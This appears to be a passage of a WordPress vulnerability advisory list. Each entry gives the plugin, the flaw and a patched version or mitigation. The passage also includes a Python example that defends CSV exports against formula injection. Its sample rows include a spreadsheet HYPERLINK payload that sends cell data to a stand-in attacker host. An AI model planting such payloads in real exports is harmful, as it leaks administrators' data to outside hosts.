Recommended Action: Update to version 2.2.34, or a newer patched version

Plugin: Google Map Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: PHAR Deserialization
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Affiliate Ads for Clickbank Products

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Saan World Clock

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.21
Recommended Action: Update to version 4.3.21, or a newer patched version

Plugin: Simple Share Buttons Adder

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: WP Simple Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.8.5
Recommended Action: Update to version 2.0.8.5, or a newer patched version

Plugin: wp tell a friend popup form

Vulnerability: Cross-Site Request Forgery via ‘TellAFriend_admin’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Checkout Files Upload for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Slideshow

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GI-Media Library

Vulnerability: Directory Traversal
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Table Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Constant Contact Forms by MailMunch

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authentication Bypass
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Logo Slider

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Uninstall

Vulnerability: Cross-Site Request Forgery to Site Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.11
Recommended Action: Update to version 4.1.11, or a newer patched version

Plugin: Simply Exclude

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HT Easy GA4 – Google Analytics WordPress Plugin

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WordPress Poll

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smash Balloon Social Post Feed – Simple Social Feeds for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Get your number

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Fotomoto

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ResponsiveVoice Text To Speech

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Unauthenticated Arbitrary Settings Update
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: PDF File Browser

Vulnerability: Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Armour – Honeypot Anti Spam

Vulnerability: No subtitle
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: PowerPack Pro for Elementor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.24
Recommended Action: Update to version 2.9.24, or a newer patched version

Plugin: Ricerca – advanced search

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: copy-me

Vulnerability: Missing Authorization & Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Request Forgery via save_campaign_preview
Patched Version: 3.1.19
Recommended Action: Update to version 3.1.19, or a newer patched version

Plugin: SearchIQ – The Search Solution

Vulnerability: Missing Authorization via getSIQPluginSettings
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Dave's WordPress Live Search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Plugin Deactivation and Deletion Errors
Patched Version: 3.7.39
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.39, 3.8.39, 3.9.37, 4.0.36, 4.1.36, 4.2.33, 4.3.29, 4.4.28, 4.5.27, 4.6.24, 4.7.24, 4.8.20, 4.9.21, 5.0.17, 5.1.14, 5.2.16, 5.3.13, 5.4.11, 5.5.10, 5.6.9, 5.7.7, 5.8.5, 5.9.4, 6.0.2

Plugin: WordPress Comments Import & Export

Vulnerability: CSV Injection
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 2.11.6
Recommended Action: Update to version 2.11.6, or a newer patched version

Plugin: 1app Business Forms

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Wp-Pro-Quiz

Vulnerability: Arbitrary Quiz Deletion via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EasyRotator for WordPress – Slider Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Verified Reviews (Avis Vérifiés)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.15
Recommended Action: Update to version 2.3.15, or a newer patched version

Plugin: Login by Auth0

Vulnerability: CSV Injection
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: BestWebSoft's Like & Share – Posts, Pages and Widget Social Extension plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery Filesystem Credential Update
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: MainWP Article Uploader Extension

Vulnerability: Authenticated (Subscriber+) Arbitrary File Deletion
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: QueryWall: Plug'n Play Firewall

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Photo Gallery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: Vertical scroll recent post

Vulnerability: Cross-Site Request Forgery via vsrp_admin_options
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Regenerate & Select Crop

Vulnerability: Sensitive Information Exposure
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: Leaflet Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Sp*tify Play Button for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.08
Recommended Action: Update to version 2.08, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Finalist

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: WPC Smart Wishlist for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Jobs for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.5.11
Recommended Action: Update to version 2.5.11, or a newer patched version

Plugin: Testimonial Slider Shortcode

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Instant CSS

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Plugmatter Optin Feature Box

Vulnerability: SQL Injection
Patched Version: 2.0.14
Recommended Action: Update to version 2.0.14, or a newer patched version

Plugin: WP-ViperGB

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Plugin: Stylish Cost Calculator – Quote Generator, Lead Gen & Price Estimator

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.0.4
Recommended Action: Update to version 7.0.4, or a newer patched version

Plugin: Gallery from files

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Count per Day

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Pretty Link Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Bitcoin / Altcoin Faucet

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Burst Statistics – Privacy-Friendly Analytics for WordPress

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: TinyMCE Custom Styles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via option_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: WP Image Zoom

Vulnerability: Cross-Site Request Forgery to Denial of Service
Patched Version: 1.24
Recommended Action: Update to version 1.24, or a newer patched version

Plugin: Hermit 音乐播放器 (Hermit Music Player)

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Polls CP

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: WP-CRM – Customer Relations Management for WordPress

Vulnerability: CSV injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.
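
The three CSV Injection entries on this list (WordPress Comments Import & Export, Login by Auth0 and WP-CRM above) share one root cause: a value a site visitor controls (a comment, a display name, a contact record) is written into a CSV export, and a spreadsheet opened by an administrator evaluates cells that begin with =, +, -, @, a tab or a carriage return as formulas. The fix belongs in the export code, not in the spreadsheet. As an added example, not code from this post or from any of those plugins, here is the neutralization that OWASP's CSV injection guidance recommends, applied to constructed sample rows; the row data, the column names and the `export_rows`/`neutralize`/`read_back` helpers are assumptions of the example:

```python
import csv
import io

# A spreadsheet treats a cell that begins with one of these as a formula (=, +, -, @)
# or can be tricked into starting a new cell before one (tab, CR, LF).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def is_formula_like(value):
    """True when a spreadsheet would evaluate this cell instead of displaying it.
    Leading spaces are skipped so '  =1+1' is still caught."""
    return str(value).lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize(value):
    """Return a value that displays literally in a spreadsheet (OWASP CSV injection
    guidance): prefix formula-like cells with a single quote so the cell is typed as
    text. Double quotes inside the value are doubled by the csv writer below, so the
    quoted field cannot be terminated early."""
    s = str(value)
    return "'" + s if is_formula_like(s) else s


def export_rows(rows, header):
    """Serialise rows as CSV text with every data cell neutralized and every field
    quoted; the header is application-controlled and is written as-is."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize(cell) for cell in row])
    return buf.getvalue()


def read_back(text):
    """Parse CSV text into rows; used to verify an export before it is handed out."""
    return list(csv.reader(io.StringIO(text)))


# Constructed sample rows (not real site data): login, display name, comment. The
# second row is the kind of display name an attacker would register so that an
# administrator's spreadsheet builds a link carrying cell A1 out of the sheet; the
# third and fourth rows exercise the remaining trigger characters.
SAMPLE_ROWS = [
    ("alice", "Alice Example", "Great post"),
    ("mallory", '=HYPERLINK("http://evil.example/?"&A1,"click")', "hi"),
    ("eve", "-1+1", "@SUM(1,1)"),
    ("trent", "Trent", "\t=1+1"),
]

if __name__ == "__main__":
    exported = export_rows(SAMPLE_ROWS, ("login", "display_name", "comment"))
    print(exported)
    # After neutralization no data cell starts with a trigger character.
    unsafe = [cell for row in read_back(exported)[1:] for cell in row if is_formula_like(cell)]
    print("formula-like cells after neutralization:", unsafe)  # prints []
```

The apostrophe prefix is visible in some spreadsheet applications, so an export meant for people to read may be better served by a format that never evaluates formulas; either way, when checking a plugin's export, read it back as above and confirm that no cell of a user-controlled column starts with a trigger character.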

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: Clone

Vulnerability: Cross-Site Request Forgery via wp_ajax_tifm_save_decision
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.12
Recommended Action: Update to version 1.4.12, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Multiple Cross-Site Scripting Issues
Patched Version: 1.5.46
Recommended Action: Update to version 1.5.46, or a newer patched version

Plugin: LWS Tools

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Database Collation Fix

Vulnerability: Cross-Site Request Forgery via admin_page
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: BuddyPress

Vulnerability: Insufficient Privilege De-escalation
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: salient-core

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: eRoom – Zoom Meetings & Webinars

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: PDF Viewer & 3D PDF Flipbook – DearPDF

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: SQL Injection
Patched Version: 13.1.0.6
Recommended Action: Update to version 13.1.0.6, or a newer patched version

Plugin: Social Sharing Toolkit

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Art Direction

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mail Bank – #1 Mail SMTP Plugin for WordPress

Vulnerability: Not specified (affected versions listed as <= 4.0.14)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: JobCareer | Job Board Responsive WordPress Theme

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Personal Dictionary – Vocabulary Games, Memory Games

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: WPForms Pro

Vulnerability: Not specified (affected version listed as 1.8.5.3)
Patched Version: 1.8.5.4
Recommended Action: Update to version 1.8.5.4, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: SQL Injection
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: flowpaper

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Mobile App Builder by WapPress

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.64
Recommended Action: Update to version 1.9.64, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Authenticated (Author+) Privilege Escalation
Patched Version: 3.6.6
Recommended Action: Update to version 3.6.6, or a newer patched version

Plugin: ImageMapper

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Page/Post Deletion via imgmap_delete_area_ajax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Job Board

Vulnerability: Local File Inclusion
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Custom Dashboard Widgets

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via cdw_DashboardWidgets
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kraken.io Image Optimizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.6
Recommended Action: Update to version 2.6.6, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.9.90
Recommended Action: Update to version 0.9.90, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery via ‘display_results’
Patched Version: 8.1.16
Recommended Action: Update to version 8.1.16, or a newer patched version

Plugin: ExportFeed: List WooCommerce Products on eBay Store

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ocean Extra

Vulnerability: Authenticated (Subscriber+) Arbitrary Post Access
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Basic Interactive World Map

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Web en Mantenimiento

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Object Injection
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Smart SEO Tool – SEO优化插件 (SEO optimization plugin)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Yoast Duplicate Post

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: WP DSGVO Tools (GDPR)

Vulnerability: Unauthenticated Arbitrary Post Deletion
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: PDF24 Article To PDF

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SportsPress – Sports Club & League Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.9
Recommended Action: Update to version 2.7.9, or a newer patched version

Plugin: 微信群发助手-Wechat Broadcast

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ImageRecycle pdf & image compression

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.12
Recommended Action: Update to version 3.1.12, or a newer patched version

Plugin: WordPress Mobile Pack – Mobile Plugin for Progressive Web Apps & Hybrid Mobile Apps

Vulnerability: Sensitive Information Exposure
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Caption
Patched Version: 2.5.5.3
Recommended Action: Update to version 2.5.5.3, or a newer patched version

Plugin: Auto Excerpt everywhere

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Unyson

Vulnerability: Cross-Site Scripting
Patched Version: 2.7.27
Recommended Action: Update to version 2.7.27, or a newer patched version

Plugin: Multi-column Tag Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 17.0.25
Recommended Action: Update to version 17.0.25, or a newer patched version

Plugin: Essential Grid Portfolio – Photo Gallery

Vulnerability: Missing Authorization
Patched Version: 3.0.19
Recommended Action: Update to version 3.0.19, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: DW Question Answer Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: Authorization Bypass
Patched Version: 6.2.4
Recommended Action: Update to version 6.2.4, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 8.1.12
Recommended Action: Update to version 8.1.12, or a newer patched version

Plugin: Logo Carousel – Responsive Logo Slider, Logo Showcase, and Clients Logo Gallery

Vulnerability: Unauthorised Private Post Access
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Simple Sticky Footer

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Delete Old Orders

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Modern Events Calendar Lite

Vulnerability: Subscriber+ Category Add Leading to Stored Cross-Site Scripting
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Advanced Ads – Ad Manager & AdSense

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.17.4
Recommended Action: Update to version 1.17.4, or a newer patched version

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Authenticated (Administrator+) Remote Code Execution
Patched Version: 5.7.8
Recommended Action: Update to version 5.7.8, or a newer patched version

Plugin: Multiple Roles

Vulnerability: Privilege Escalation
Patched Version: 1.3.7
